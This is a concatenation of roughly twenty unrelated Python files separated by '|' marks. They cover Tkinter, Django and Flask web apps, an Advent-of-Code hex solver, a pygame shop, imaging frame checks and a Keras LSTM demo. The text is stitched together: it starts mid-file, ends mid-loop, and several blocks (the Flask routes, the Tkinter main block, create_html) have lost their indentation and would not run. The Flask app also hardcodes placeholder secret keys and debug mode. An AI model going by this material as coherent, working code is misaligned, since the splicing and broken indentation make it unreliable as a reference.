print("Principal to be paid:%5.2f"%abs(principal2Pay));
print("Interest to be paid:%5.2f"%abs(interest2Pay));
print("Principal+Interest, to be paid:%5.2f"%abs(principal2Pay+interest2Pay));
|
from MainWindows.MainWindow import MainWindow
from SubWindows.SubWindow import SubWindow
import tkinter as tk
class Application():
    """Controller that wires the main window's file-select button to the
    sub window."""

    def __init__(self, master=None):
        self.main_window = MainWindow(master)
        self.sub_window = SubWindow()
        self.change_command()

    def change_command(self):
        # Rebind the select button so clicks route through this controller.
        button = self.main_window.select_file_frame.file_select_button
        button["command"] = self.push_file_select_button

    def push_file_select_button(self):
        """Run the file dialog; forward a non-empty selection to the sub
        window."""
        self.main_window.push_select_button()
        selected = self.main_window.path
        if selected == "":
            return
        self.sub_window.set_path(selected)
if __name__ == "__main__":
root = tk.Tk()
window = Application(root)
root.mainloop() |
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from authentication.serializers import CurrentUserSerializer
from like_app.schema import EmptySchema
from posts import utils
from posts.serializers import PostSerializers
from posts.models import Post
class PostViewSet(ModelViewSet):
    """
    list:
    Get list of posts
    Get list of user posts
    retrieve:
    Retrieve post
    Retrieve specific post with ID
    create:
    Create new Post
    Create new Post.
    update:
    Update Post with
    Update Post with the given ID.
    partial_update:
    Partial update of Post
    Partial update of Post
    destroy:
    Delete Post
    Delete Post with given ID
    like:
    Like a post instance
    Like a post instance, like return `1`
    dislike:
    Dislike a post instance
    Dislike a post instance, and remove like if it exist
    users:
    Return all users by post id
    Return all users which likes post by id
    """
    serializer_class = PostSerializers
    queryset = Post.objects.all()
    permission_classes = [IsAuthenticated]

    @swagger_auto_schema(responses={'204': EmptySchema})
    @action(detail=True, methods=['POST'], permission_classes=(IsAuthenticated,))
    def like(self, request, pk=None):
        # Register the requesting user's like on this post; no body returned.
        obj = self.get_object()
        utils.add_like(obj, request.user)
        return Response(status=status.HTTP_204_NO_CONTENT)

    @swagger_auto_schema(responses={'204': EmptySchema})
    @action(detail=True, methods=['POST'], permission_classes=(IsAuthenticated,))
    def dislike(self, request, pk=None):
        # Remove the requesting user's like (if any); no body returned.
        obj = self.get_object()
        utils.remove_like(obj, request.user)
        return Response(status=status.HTTP_204_NO_CONTENT)

    @swagger_auto_schema(responses={'200': CurrentUserSerializer(many=True)})
    @action(detail=True, methods=['GET'], permission_classes=(IsAuthenticated,))
    def users(self, request, pk=None):
        # Bug fix: the original returned serialized data with HTTP 204
        # No Content, which tells clients to discard the body; 200 OK is
        # the correct status for a response carrying data.
        obj = self.get_object()
        fans = utils.get_fans(obj)
        serializer = CurrentUserSerializer(fans, many=True)
        return Response(serializer.data, status=status.HTTP_200_OK)
|
#while roof 돌려서 lew line으로 만든다
#len(board)가 일자
#count 가 place에 도달했을떄 new에다가slash추가
#r.strip = 오른쪽에있는가 사라진다
class Molecule:
    """Fixed-size grid of '.' cells on which atoms render as slashes."""

    def __init__(self, row, column):
        """Build a row x column board; every cell starts as '.'."""
        grid = []
        board = ''
        for x in range(row):
            grid.append(('. ' * column)[:-1])
        for list1 in grid:
            board += list1
        self.row = row
        self.column = column
        self.board = board
        self.grid = grid

    def atom(self, pos, forward=True):
        """Place one atom at pos=(row, col): '\\' when forward, else '/'.

        Bug fixes vs. the original:
        * the re-gridding step compared an always-even line length against
          the odd target (column*2 - 1), so the rendered grid was always
          empty;
        * the modified board was never stored back, so placing a second
          atom erased the first;
        * the bounds assert used <=, accepting the one-past-the-end index.
        """
        x, y = pos
        slash = '\\' if forward else '/'
        # Normalize to a compact (space-free) board of row*column cells.
        board = self.board.replace(' ', '')
        place = x * self.column + y
        assert place < (self.column * self.row), 'invalid position'
        new = ''
        for counter in range(len(board)):
            new += board[counter] if place != counter else slash
        # Persist so subsequent atoms accumulate on the same board.
        self.board = new
        grid = ''
        line = ''
        for char in new:
            line += char + ' '
            # A full rendered row is column cells, each "X " -> 2*column chars.
            if len(line) == self.column * 2:
                grid += line[:-1] + '\n'
                line = ''
        self.grid = grid.rstrip('\n')

    def atoms(self, list1):
        """Place a forward atom at every position in list1."""
        for pos in list1:
            self.atom(pos)

    def __str__(self):
        return self.grid
from enum import Enum
class VariableType(Enum):
    """Kind of symbol tracked by the compiler/interpreter."""
    variable = 0          # user-declared variable
    temporary = 1         # compiler-generated temporary
    user_function = 2     # function defined in the source program
    builtin_function = 3  # function provided by the runtime
class ScopeType(Enum):
    """Lexical scope kind for symbol resolution."""
    top = 0       # module/global scope
    function = 1  # function body scope
    sub = 2       # nested sub-scope
|
from itertools import cycle
from sys import argv
# Accept either a .txt file containing the route or the route itself as a
# comma-separated command-line argument.
if argv[1][-4:] == '.txt':
    route = open(argv[1], 'r').read().strip().split(',')
else:
    route = argv[1].split(',')
# Hex directions in clockwise order; opposite pairs sit 3 apart, and two
# steps that are 2 apart combine into the one between them.
options = 'nw', 'n', 'ne', 'se', 's', 'sw'


def optimize(route):
    """Shrink route in place: cancel opposite steps, merge adjacent ones."""
    doubled = options + options  # wrap-around indexing without modulo
    for step in options:
        idx = options.index(step)
        opposite = doubled[idx + 3]
        neighbour = doubled[idx + 2]
        merged = doubled[idx + 1]
        # e.g. 'n' + 's' cancel out entirely.
        while step in route and opposite in route:
            route.remove(step)
            route.remove(opposite)
        # e.g. 'nw' + 'ne' rewrite to a single 'n'.
        while step in route and neighbour in route:
            route.remove(step)
            route.remove(neighbour)
            route.append(merged)
# Part 1
route1 = route[:]
optimize(route1)
# Steps remaining after full cancellation = hex distance to the destination.
answer1 = len(route1)
print('Destination is reachable in {} steps'.format(answer1))
# Part 2
farthest_away = 0
route2 = []
# Re-optimize after each step to track the maximum distance ever reached.
for i in range(len(route)):
    route2.append(route[i])
    optimize(route2)
    farthest_away = max(farthest_away, len(route2))
answer2 = farthest_away
print('Farthest away from starting points is {} steps'.format(answer2))
|
#importing of the neccessary modules and method
#the os path module implements some useful functions on pathnames and directory access
#imports that are making big changes
from os.path import abspath, dirname, join
from flask import flash, Flask, Markup, redirect, render_template, url_for
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.wtf import Form
from wtforms import fields
from wtforms.ext.sqlalchemy.fields import QuerySelectField
#making a path to the database
_cwd = dirname(abspath(__file__))
SECRET_KEY = 'flask-session-insecure-secret-key'
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + join(_cwd, 'wms.db')
SQLALCHEMY_ECHO = True
WTF_CSRF_SECRET_KEY = 'this-should-be-more-random'
app = Flask(__name__)
app.config.from_object(__name__)
db = SQLAlchemy(app)
#making table for tracking_site
#making table for tracking_site
class Site(db.Model):
    """A received-goods record (one inventory line item)."""
    __tablename__ = 'received_goods'
    incoming_itemID = db.Column(db.Integer,primary_key = True)
    product_id = db.Column(db.String(80))
    product_name = db.Column(db.String(120))
    supplyer_name = db.Column(db.String(300))
    # Bug fix: SQLAlchemy's Integer type takes no length argument —
    # db.Integer(9) raises TypeError at class-definition time.
    amount = db.Column(db.Integer)

    # Bug fix: this model has no base_url attribute, so the original
    # __repr__/__str__ raised AttributeError; show the product name instead.
    def __repr__(self):
        return '<Site %s>' % (self.product_name)

    def __str__(self):
        return self.product_name
class SiteForm(Form):
    """WTForms form mirroring the user-editable Site columns."""
    product_id = fields.StringField()
    product_name = fields.StringField()
    supplyer_name = fields.StringField()
    # Entered as text; NOTE(review): the model column is Integer — no
    # coercion/validation happens here.
    amount = fields.StringField()
#perform the url mapping
@app.route("/")
def index():
site_form = SiteForm()
return render_template("index.html",site_form = site_form)
#the form is loaded as the index page
@app.route("/site",methods =("POST",))
def add_site():
form = SiteForm()
if form.validate_on_submit():
site = Site()
form.populate_obj(site)
db.session.add(site)
db.session.commit()
return redirect(url_for("index"))
return render_template("validation_error.html",form = form)
#get the data inserted on this page url mapping
@app.route("/sites")
def view_sites():
    # NOTE(review): product_id is a String column; the >= 0 comparison
    # looks like a keep-everything filter — confirm intent.
    data = Site.query.filter(Site.product_id >= 0)
    #data = [next(data)] + [[_make_link(cell) if i == 0 else cell for i, cell in enumerate(row)] for row in data]
    return render_template("display_data.html", data=data ,type="Sites")
#display the data down here without on reload
if __name__ == "__main__":
    app.debug = True  # development server only; disable in production
    db.create_all()   # create the tables on first run
    app.run()
|
import numpy as np
import os
import cv2
from tqdm import tqdm
import tables
def check_widefield_frame_times(base_directory):
    """Compare the number of widefield camera triggers against the number
    of frames stored in the downsampled delta-F file, and record the result.

    Writes Frame_Check_Passed.txt / Frame_Check_Failed.txt into
    base_directory containing both counts and a match message.
    """
    # Load widefield frame times (pickled dict of index -> time).
    widefield_frame_times = np.load(os.path.join(base_directory, "Stimuli_Onsets", "Frame_Times.npy"), allow_pickle=True)[()]
    widefield_frame_times = list(widefield_frame_times.values())
    number_of_widefield_triggers = len(widefield_frame_times)

    # Count frames actually present in the HDF5 data matrix (rows = frames).
    widefield_filename = os.path.join(base_directory, "Downsampled_Delta_F.h5")
    widefield_file_container = tables.open_file(widefield_filename, mode="r")
    widefield_data = widefield_file_container.root["Data"]
    widefield_frames = np.shape(widefield_data)[0]
    widefield_file_container.close()

    # Compare counts and pick the report file name.
    if number_of_widefield_triggers == widefield_frames:
        # Bug fix: corrected "Numbrrs" typo in the report message.
        match_message = "Frame Numbers Match :) "
        filename = "Frame_Check_Passed.txt"
        print("Passed :)")
    else:
        match_message = "Frame Numbers Dont Match :( "
        filename = "Frame_Check_Failed.txt"
        print("Failed :( " + base_directory + "Frame Difference " + str(number_of_widefield_triggers - widefield_frames))

    # Save the outcome as a small text report next to the data.
    text_filename = os.path.join(base_directory, filename)
    with open(text_filename, 'w') as f:
        f.write('Widefield Frame Triggers: ' + str(number_of_widefield_triggers) + "\n")
        f.write('Widefield Frames: ' + str(widefield_frames) + "\n")
        f.write(match_message + "\n")
# Sessions to validate, given relative to the external-drive root below.
session_list = [
    r"NRXN78.1A/2020_11_28_Switching_Imaging",
    r"NRXN78.1A/2020_12_05_Switching_Imaging",
    r"NRXN78.1A/2020_12_09_Switching_Imaging",
    r"NRXN78.1D/2020_12_07_Switching_Imaging",
    r"NRXN78.1D/2020_11_29_Switching_Imaging",
    r"NRXN78.1D/2020_12_05_Switching_Imaging",
    r"NXAK14.1A/2021_05_21_Switching_Imaging",
    r"NXAK14.1A/2021_05_23_Switching_Imaging",
    r"NXAK14.1A/2021_06_11_Switching_Imaging",
    r"NXAK14.1A/2021_06_13_Transition_Imaging",
    r"NXAK14.1A/2021_06_15_Transition_Imaging",
    r"NXAK14.1A/2021_06_17_Transition_Imaging",
    r"NXAK22.1A/2021_10_14_Switching_Imaging",
    r"NXAK22.1A/2021_10_20_Switching_Imaging",
    r"NXAK22.1A/2021_10_22_Switching_Imaging",
    r"NXAK22.1A/2021_10_29_Transition_Imaging",
    r"NXAK22.1A/2021_11_03_Transition_Imaging",
    r"NXAK22.1A/2021_11_05_Transition_Imaging",
    r"NXAK4.1B/2021_03_02_Switching_Imaging",
    r"NXAK4.1B/2021_03_04_Switching_Imaging",
    r"NXAK4.1B/2021_03_06_Switching_Imaging",
    r"NXAK4.1B/2021_04_02_Transition_Imaging",
    r"NXAK4.1B/2021_04_08_Transition_Imaging",
    r"NXAK4.1B/2021_04_10_Transition_Imaging",
    r"NXAK7.1B/2021_02_26_Switching_Imaging",
    r"NXAK7.1B/2021_02_28_Switching_Imaging",
    r"NXAK7.1B/2021_03_02_Switching_Imaging",
    r"NXAK7.1B/2021_03_23_Transition_Imaging",
    r"NXAK7.1B/2021_03_31_Transition_Imaging",
    r"NXAK7.1B/2021_04_02_Transition_Imaging",
    r"NRXN78.1A/2020_11_14_Discrimination_Imaging",
    r"NRXN78.1A/2020_11_15_Discrimination_Imaging",
    r"NRXN78.1A/2020_11_24_Discrimination_Imaging",
    r"NRXN78.1A/2020_11_21_Discrimination_Imaging",
    r"NRXN78.1D/2020_11_14_Discrimination_Imaging",
    r"NRXN78.1D/2020_11_15_Discrimination_Imaging",
    r"NRXN78.1D/2020_11_25_Discrimination_Imaging",
    r"NRXN78.1D/2020_11_23_Discrimination_Imaging",
    r"NXAK4.1B/2021_02_04_Discrimination_Imaging",
    r"NXAK4.1B/2021_02_06_Discrimination_Imaging",
    r"NXAK4.1B/2021_02_22_Discrimination_Imaging",
    r"NXAK4.1B/2021_02_14_Discrimination_Imaging",
    r"NXAK7.1B/2021_02_01_Discrimination_Imaging",
    r"NXAK7.1B/2021_02_03_Discrimination_Imaging",
    r"NXAK7.1B/2021_02_24_Discrimination_Imaging",
    r"NXAK7.1B/2021_02_22_Discrimination_Imaging",
    r"NXAK14.1A/2021_04_29_Discrimination_Imaging",
    r"NXAK14.1A/2021_05_01_Discrimination_Imaging",
    r"NXAK14.1A/2021_05_09_Discrimination_Imaging",
    r"NXAK14.1A/2021_05_07_Discrimination_Imaging",
    r"NXAK22.1A/2021_09_25_Discrimination_Imaging",
    r"NXAK22.1A/2021_09_29_Discrimination_Imaging",
    r"NXAK22.1A/2021_10_08_Discrimination_Imaging",
    r"NXAK22.1A/2021_10_07_Discrimination_Imaging",
]
# Prefix each relative session with the data-drive root, then run the check.
full_session_list = []
for item in session_list:
    full_session_list.append(os.path.join("/media/matthew/Expansion/Control_Data", item))
print(full_session_list)
for base_directory in full_session_list:
    check_widefield_frame_times(base_directory)
# %load q01_get_total_deliveries_players/build.py
# Default imports
import numpy as np
# Batsman name to look up (byte string to match the |S50 array dtype).
batsman_input= b'SR Tendulkar'
# Full deliveries table; column 13 holds the batsman name.
ipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=0, delimiter=',')
def get_total_deliveries_played(batsman_input, matches=None):
    """Return how many deliveries ``batsman_input`` faced.

    :param batsman_input: batsman name exactly as stored in column 13
        (a byte string for the |S50 array).
    :param matches: optional deliveries array; defaults to the module-level
        ``ipl_matches_array`` (backward compatible with the original call).
    :return: number of matching rows as an int.

    Bug fix: the original indexed ``counts_elements[1]`` from np.unique,
    which raised IndexError whenever the batsman was absent (only False
    appears in the mask); counting nonzero mask entries returns 0 instead.
    """
    data = ipl_matches_array if matches is None else matches
    batsman = data[:, 13]
    return int(np.count_nonzero(batsman == batsman_input))
get_total_deliveries_played(batsman_input)
|
from django.utils import timezone
from django.db import models
from django.contrib.auth.models import BaseUserManager
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
# CUSTOM USER AUTH
###############################################################################
class UserManager(BaseUserManager):
    """Manager that creates users keyed on email instead of username."""

    def create_user(self, email, password, **kwargs):
        """Create, save and return a regular active user."""
        user = self.model(
            email=self.normalize_email(email),
            is_active=True,
            **kwargs
        )
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, email, password, **kwargs):
        """Create, save and return a superuser (staff + admin + active)."""
        user = self.model(
            email=email,
            is_superuser=True,
            is_staff=True,
            is_active=True,
            is_admin=True,
            **kwargs
        )
        user.set_password(password)
        user.save(using=self._db)
        # Bug fix: the original returned the UserManager class itself
        # instead of the newly created user instance.
        return user
class User(AbstractBaseUser, PermissionsMixin):
    """Custom auth user identified by email rather than username."""
    USERNAME_FIELD = 'email'  # Django uses this field for login
    email = models.EmailField(unique=True)
    first_name = models.CharField(max_length=30, null=True, blank=True)
    last_name = models.CharField(max_length=30, null=True, blank=True)
    contact_number = models.CharField(max_length=30, null=True, blank=True)
    is_staff = models.BooleanField(default=False)
    is_active = models.BooleanField(default=False)
    is_admin = models.BooleanField(default=False)

    def get_full_name(self):
        """Django contract hook; the email doubles as the display name."""
        return self.email

    def get_short_name(self):
        """Django contract hook; the email doubles as the short name."""
        return self.email

    objects = UserManager()
###############################################################################
###############################################################################
###############################################################################
class Category(models.Model):
    """Game category (soft-deletable via is_active)."""
    name = models.CharField(max_length=20)
    is_active = models.BooleanField(default=True)
class Game_info(models.Model):
    """Catalog entry for a downloadable game."""
    title = models.CharField(max_length=30, unique=True)
    description = models.TextField(max_length=3000)
    platform = models.CharField(max_length=15)
    # NOTE(review): ForeignKey without on_delete implies Django < 2.0;
    # confirm the project's Django version before upgrading.
    category_id = models.ForeignKey(Category)
    img = models.ImageField(null=True, blank=True)
    thumbnail = models.ImageField(null=True, blank=True)
    dlink = models.CharField(max_length=100, null=True, blank=True)  # download link
    vlink = models.CharField(max_length=100, null=True, blank=True)  # video link
    is_active = models.BooleanField(default=True)

    def __repr__(self):
        return self.title

    def __str__(self):
        return self.title
class Feedback(models.Model):
    """A user's rating and comment."""
    comment = models.TextField(max_length=300)
    # Bug fix: default=timezone.now() was evaluated once at import time,
    # stamping every row with the process start time; pass the callable so
    # it is evaluated per insert.
    created_date = models.DateTimeField(default=timezone.now, blank=True, null=True)
    published_date = models.DateTimeField(blank=True, null=True)
    rating = models.IntegerField()
    user = models.ForeignKey(User)
    is_active = models.BooleanField(default=True)
class Game_request(models.Model):
    """A user's request for a game to be added."""
    title = models.CharField(max_length=30)
    # Bug fix: default=timezone.now() was evaluated once at import time;
    # pass the callable so each row gets its own creation timestamp.
    created_date = models.DateTimeField(default=timezone.now, blank=True, null=True)
    published_date = models.DateTimeField(blank=True, null=True)
    user = models.ForeignKey(User)
    is_active = models.BooleanField(default=True)
|
#!/usr/bin/env python3
"""Module implementing a CLI for the Cook scheduler API. """
import logging
import signal
import sys
from cook import util
from cook.cli import run
from cook.util import print_error
def main(args=None, plugins=None):
    """CLI entry point: run the Cook CLI and exit with its status code.

    :param args: argv-style argument list; defaults to sys.argv[1:].
    :param plugins: optional plugin mapping; defaults to an empty dict.
        (Changed from a mutable default argument — which is shared across
        calls — to the None-sentinel idiom; callers are unaffected.)
    """
    if args is None:
        args = sys.argv[1:]
    if plugins is None:
        plugins = {}
    try:
        result = run(args, plugins)
        sys.exit(result)
    except Exception as e:
        # Log the full traceback, show a short message, exit non-zero.
        logging.exception('exception when running with %s' % args)
        print_error(str(e))
        sys.exit(1)
def sigint_handler(_, __):
    """
    Sets util.quit_running to True (which is read by other
    threads to determine when to stop), and then exits.
    """
    util.quit_running = True
    print('Exiting...')
    sys.exit(0)

# Install the Ctrl-C handler at import time so all entry points get it.
signal.signal(signal.SIGINT, sigint_handler)

if __name__ == '__main__':
    main()
|
# C3 == 2 "String"
# C17 == 15 "В заданому тексті замінити слова заданої довжини визначеним рядком."
# Створити клас, який складається з виконавчого методу, що виконує дію текстовим рядком (п.3), тип якого визначено варіантом (п.2).
# Необхідно обробити всі виключні ситуації, що можуть виникнути під час виконання програмного коду.
# Всі змінні повинні бути описані та значення їх задані у виконавчому методі.
import re
class Main():
    """Replace every word of a user-given length in a sample text with a
    user-given string (exercise variant C3 "String" / C17)."""

    @staticmethod
    def _replace_words(text, replacement, word_length):
        r"""Return text with each word of exactly word_length letters
        replaced by replacement.

        Bug fix: the original character class [а-яА-Яa-zA-Z] omits the
        Ukrainian letters і, ї, є, ґ, so words containing them were never
        matched; [^\W\d_] covers any Unicode letter.
        """
        pattern = r"\b[^\W\d_]{" + str(word_length) + r"}\b"
        return re.sub(pattern, replacement, text)

    def __init__(self):
        # The text being processed (kept verbatim from the assignment).
        text = "Створити клас, який складається з виконавчого методу, що виконує дію текстовим рядком, тип якого визначено варіантом.\
Необхідно обробити всі виключні ситуації, що можуть виникнути під час виконання програмного коду.\
Всі змінні повинні бути описані та значення їх задані у виконавчому методі."
        if type(text) is not str:
            print("Заміняти слова треба в тексті, написано ж")
            return
        replace = str(input("Введіть, чим ви хочете замінити слова: "))
        try:
            word_length = int(input("Введіть довжину слів, які треба замінити: "))
        except ValueError:
            print("Довжина шуканих слів повинна бути цілим числом, це ж очевидно, блін")
            return
        text = self._replace_words(text, replace, word_length)
        print(text)
main = Main()
|
#
# Python script that takes a folder and a file
# and creates the galaxy html
#
# @author James Boocock.
import os
galhtmlprefix = """<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="Galaxy %s tool output - see http://g2.trac.bx.psu.edu/" />
<title></title>
<link rel="stylesheet" href="/static/style/base.css" type="text/css" />
</head>
<body>
<div class="document">
"""
galhtmlpostfix = """</div>\n</body>\n</html>\n"""
def create_html(file_dir, html_file, base_name):
f = file(html_file, 'w')
f.write(galhtmlprefix)
flist = os.listdir(file_dir)
for i, data in enumerate(flist):
f.write('<li><a href="%s">%s</a></li>\n' % (os.path.split(data)[-1],os.path.split(data)[-1]))
f.write(galhtmlpostfix)
f.close()
|
"""
Este modulo contiene todo lo necesario para
dar soporte al menu de inicio, de pausa y
de compra
"""
import pygame
class Shop():
    """
    In-game shop: draws the board/icons and applies purchased upgrades.
    """
    def __init__(self, screen, settings):
        """Load every shop asset and lay it out relative to the board."""
        self.screen = screen
        self.settings = settings
        # Seconds between rounds (the shopping window length).
        self.time_between_rounds = 30
        self.shop_background = None
        self.shop_background_rect = None
        # Per-slot image variants and their rects, stored in parallel lists.
        self.shop_items = []
        self.shop_items_rects = []
        # Current upgrade level per slot (also selects which icon to draw).
        self.shop_progress = [0, 0, 0, 0, 0, 0]
        # Lives bought this round; the price escalates with each purchase
        # and the counter resets every new round.
        self.lifes_progress = 0
        self.shop_open = False

        # Icon that opens the shop, pinned near the top-right corner.
        self.shop_icon = pygame.image.load(".\\resources\\shop_icon.bmp")
        self.shop_icon_rect = self.shop_icon.get_rect()
        self.shop_icon_rect.left = self.settings.screen_width - 80
        self.shop_icon_rect.top = 10

        # The shop board, centred on screen.
        self.shop_background = pygame.image.load(".\\resources\\shop_board.bmp")
        self.shop_background_rect = self.shop_background.get_rect()
        self.shop_background_rect.centerx = settings.screen_width / 2
        self.shop_background_rect.centery = settings.screen_height / 2

        # The close-shop button, near the board's top-right corner.
        self.exit_icon = pygame.image.load(".\\resources\\exit_shop.png")
        self.exit_icon_rect = self.exit_icon.get_rect()
        self.exit_icon_rect.centerx = self.shop_background_rect.right - 40
        self.exit_icon_rect.centery = self.shop_background_rect.top + 40

        # Data-driven version of the original hand-unrolled loading code:
        # (.bmp base names in upgrade-level order, board-relative offsets).
        item_specs = [
            (("repair_lvl1", "repair_lvl2", "repair_lvl3"), (218, 178)),
            (("speed_lvl1", "speed_lvl2", "speed_lvl3",
              "speed_no_upgrades"), (500, 178)),
            (("ship_health_lvl1", "ship_health_lvl2", "ship_health_lvl3",
              "ship_health_no_upgrades"), (782, 178)),
            (("damage_lvl1", "damage_lvl2", "damage_lvl3",
              "damage_no_upgrades"), (218, 420)),
            (("bpm_lvl1", "bpm_no_upgrades"), (500, 420)),
            (("1up",), (782, 420)),
        ]
        for names, (dx, dy) in item_specs:
            images = []
            rects = []
            for name in names:
                image = pygame.image.load(".\\resources\\" + name + ".bmp")
                rect = image.get_rect()
                rect.centerx = self.shop_background_rect.left + dx
                rect.centery = self.shop_background_rect.top + dy
                images.append(image)
                rects.append(rect)
            self.shop_items.append(images)
            self.shop_items_rects.append(rects)

    def blitme(self):
        """
        Draw the board, the exit button and each slot's current icon —
        only while the shop is open.
        """
        if self.shop_open:
            self.screen.blit(self.shop_background, self.shop_background_rect)
            self.screen.blit(self.exit_icon, self.exit_icon_rect)
            for i in range(len(self.shop_items)):
                self.screen.blit(self.shop_items[i][self.shop_progress[i]],
                                 self.shop_items_rects[i][self.shop_progress[i]])

    def upgrade(self, upgrade, ship, player):
        """
        Apply the purchase named by `upgrade` to the ship/player state.
        """
        if upgrade == "repair":
            ship.health = ship.max_health
        elif upgrade == "speed" and self.shop_progress[1] < 3:
            ship.speed_factor += 3
            self.shop_progress[1] += 1
        elif upgrade == "health" and self.shop_progress[2] < 3:
            ship.max_health += 50
            ship.health = ship.max_health
            self.shop_progress[2] += 1
            # NOTE(review): bumping slot 0 (the repair icon) alongside the
            # health level looks intentional but is undocumented — confirm.
            if self.shop_progress[2] < 3:
                self.shop_progress[0] += 1
        elif upgrade == "damage" and self.shop_progress[3] < 3:
            ship.bullet_damage += 5
            self.shop_progress[3] += 1
        # Bug fix: the one-shot "bpm" purchase was gated on shop_progress[1]
        # (the speed slot) while incrementing slot 4, so it could be bought
        # repeatedly (or blocked by a speed purchase); gate on slot 4.
        elif upgrade == "bpm" and self.shop_progress[4] < 1:
            self.settings.bullets_allowed += 2
            ship.bullet_speed_factor += 5
            self.shop_progress[4] += 1
        elif upgrade == "life":
            player.lifes += 1
            self.lifes_progress += 1
|
import cx_Oracle as c
from flask import Flask,render_template, request,make_response
app=Flask(__name__)
@app.route('/')
def index():
    # Landing page.
    return render_template('index.html')
@app.route('/form',methods=['POST'])
def form():
    # Render the profile-card entry form.
    return render_template('form.html')
@app.route('/store',methods=['POST'])
def store():
    """Insert the submitted profile-card form into the Oracle DB.

    Commits on success, rolls back on failure.  Bug fixes vs. the
    original: the cursor/connection were never released (leaked on every
    request), and the response always claimed success even after a
    rollback.
    """
    if request.method=='POST':
        con = c.connect('c##scott/tiger@localhost/orcl')
        print(con.version)
        cur = con.cursor()
        msg = ''
        try:
            name = request.form.get('name')
            contact = request.form.get('contact')
            email = request.form.get('email')
            # Bind parameters — never string-build SQL from form input.
            cur.execute("insert into profileCard values(:x,:y,:z)",
                        {"x": name, "y": contact, "z": email})
            con.commit()
            msg = 'Message Successfully delivered'
            print(msg, con)
        except Exception as e:
            print(e)
            con.rollback()
            msg = 'error in insert'
        finally:
            # Bug fix: release DB resources instead of leaking them.
            cur.close()
            con.close()
        # Bug fix: report the actual outcome instead of always claiming
        # the message was delivered.
        return '<h1>' + msg + '</h1>'
if __name__=='__main__':
    app.run()  # development server
|
# -*- coding: utf-8
from __future__ import unicode_literals
from httplib import responses
from flask import current_app as app
from flask import Blueprint, jsonify, request
from www.content import repository, exceptions
from www.main.serializers import serialize
from www.main.exceptions import ApiError
from www.decorators import add_headers, cache_headers
api = Blueprint('main-api', __name__, subdomain='api')
def abort(status_code):
    """Abort the request by raising ApiError carrying the standard HTTP
    reason phrase for status_code (empty string when unknown)."""
    reason = responses.get(status_code, '')
    raise ApiError(reason, status_code=status_code)
@api.route('/')
@api.route('/<path:path>/')
@add_headers({'Access-Control-Allow-Origin': '*'})
@cache_headers(seconds=21600)
def index(path=''):
    """Serialize the content directory at `path` on the requested branch.

    403 for non-public branches; 404 for unknown branch or path.
    """
    branch = request.args.get('branch', app.config.get('BRANCHES_DEFAULT'))
    if branch not in app.config.get('BRANCHES_PUBLIC'):
        abort(403)
    try:
        repo = repository(app.config.get('CONTENT_ROOT')).changeset(branch)
    except exceptions.RepositoryError:
        abort(404)
    try:
        directory = repo.get_directory(path)
    except exceptions.NodeDoesNotExistError:
        abort(404)
    return jsonify(serialize(directory, config=app.config))
@api.route('/<name>')
@api.route('/<path:path>/<name>')
@add_headers({'Access-Control-Allow-Origin': '*'})
@cache_headers(seconds=21600)
def file(name, path=''):
    """Serialize a single content file `name` under `path`.

    403 for non-public branches; 404 for unknown branch, path or file.
    NOTE: the view name shadows the Python 2 builtin `file`; kept for
    endpoint/url_for compatibility.
    """
    branch = request.args.get('branch', app.config.get('BRANCHES_DEFAULT'))
    if branch not in app.config.get('BRANCHES_PUBLIC'):
        abort(403)
    try:
        repo = repository(app.config.get('CONTENT_ROOT')).changeset(branch)
    except exceptions.RepositoryError:
        abort(404)
    try:
        # Only extensions with a configured renderer are looked up.
        page = repo.find_file(
            path, name, app.config.get('FILE_RENDERERS', {}).keys())
    except exceptions.NodeDoesNotExistError:
        abort(404)
    return jsonify(serialize(page, config=app.config))
|
# Databricks notebook source
# MAGIC %md
# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)
# MAGIC
# MAGIC This is a 2019-2021 augmentation and update of [Adam Breindel](https://www.linkedin.com/in/adbreind)'s initial notebooks.
# MAGIC
# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials Spark 3.0.1 and Python 3+ compliant._
# COMMAND ----------
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
# Toy LSTM task: learn to predict the next letter from a 3-letter window.
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
seq_length = 3
dataX = []
dataY = []
# Build (window, next-char) training pairs over the whole alphabet.
for i in range(0, len(alphabet) - seq_length, 1):
    seq_in = alphabet[i:i + seq_length]
    seq_out = alphabet[i + seq_length]
    dataX.append([char_to_int[char] for char in seq_in])
    dataY.append(char_to_int[seq_out])
    print (seq_in, '->', seq_out)
# reshape X to be [samples, time steps, features]
X = numpy.reshape(dataX, (len(dataX), seq_length, 1))
X = X / float(len(alphabet))  # normalize codes to [0, 1)
y = np_utils.to_categorical(dataY)  # one-hot targets
model = Sequential()
model.add(LSTM(32, input_shape=(X.shape[1], X.shape[2])))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X, y, epochs=400, batch_size=1, verbose=2)
scores = model.evaluate(X, y)
print("Model Accuracy: %.2f%%" % (scores[1]*100))
# Probe with windows containing an out-of-order 'W' to inspect behaviour.
for pattern in ['WBC', 'WKL', 'WTU', 'DWF', 'MWO', 'VWW', 'GHW', 'JKW', 'PQW']:
    pattern = [char_to_int[c] for c in pattern]
    x = numpy.reshape(pattern, (1, len(pattern), 1))
    x = x / float(len(alphabet))
